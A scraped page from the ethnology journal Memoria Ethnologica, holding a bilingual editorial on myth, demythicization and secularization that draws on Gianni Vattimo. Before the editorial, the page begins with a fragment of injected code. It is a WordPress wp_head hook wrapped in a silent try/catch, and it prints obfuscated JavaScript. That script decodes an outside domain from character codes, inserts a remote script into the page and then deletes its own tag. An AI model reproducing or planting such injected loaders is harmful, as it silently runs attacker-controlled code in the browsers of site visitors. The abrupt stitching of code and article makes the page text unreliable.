2,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} » Cuvânt către cititor Cuvânt către cititor | Memoria Ethnologica

Descriere

Cuvânt către cititor
Mitul, ca formă complexă a limbajului simbolic, stârnește și astăzi interesul omului modern, chiar dacă intuim cu ușurință că atitudinile sale sunt diferite. Astfel, aceste atitudini față de mit ar putea fi grupate, în opinia lui Gianni Vattimo, în trei tipuri ideale: arhaism, relativism cultural și iraționalism temperat. Dacă ținem seama de consistența acestor modele atitudinale putem afirma că demitizarea este doar un alt mit al modernității. Ea ne arată modul în care trebuie să percepem sensul secularizării. Secularizarea permite mitului să-și refacă legitimitatea, însă numai sub raportul unei experiențe anemice, a unei trăiri vulnerabile, slăbite (sau chiar ascunse) a conținuturilor mitice ori religioase ale tradiției. ”Regăsirea mitului” va fi în mod evident condiționată de experiența culturală a demitizării.
Astăzi, la fel ca în trecut, prin intermediul mitului comunitățile își afirmă fundamentul existenței ca atare, iar membrii acesteia înțeleg faptul că mitul este un vehicol al reproducerii culturale. Oamenii împărtășesc un set de valori comune și un anumit mod de plasare în lume care îi singularizează în cadrul relațiilor cu indivizii altor comunități. Mitul este astfel un liant al constituirii comunității, al diferențierii simbolice a acesteia, dar este și un factor activ în ceea ce privește relaționarea identitară cu cei din alte comunități.
To the Reader
Myth as a complex form of the symbolic language, stirrs modern man’s interest also nowadyas, even if it can be easily understood that the attitutdes are different. Thus, these attitudes as concerns myth could be grouped, according to Gianni Vattimo, into three ideal types: archaism, cultural relativism and temperate irrationalism. Taking into consideration the consistence of these attitudinal models we could state that demythicization is only another myth of modernity. It shows the way how to perceive the sense of secularization. Secularization allows myths to regain their legitimacy but only in the form of a feeble experience, of a
vulnerable, weakened (or even hidden) feeling of the mythical content or the religious tradition. “The rediscovery of myth” will be evidently conditioned by the cultural experience of the demythicization.
Nowadays, as in the past, communities affirm the basis of their very existence through myths, and their members understand the fact that myth is a vehicle of cultural reproduction. People share a number of common values and a certain way of relating to the world that singularizes them in relation with the individuals of other communities, Myth is thus a binder in the constituting of the community, of the symbolic differentiation of it, but it also an active factor as concerns identitary relationing with those from other communities.

Recenzii

Nu există recenzii până acum.

Fii primul care adaugi o recenzie la „Cuvânt către cititor”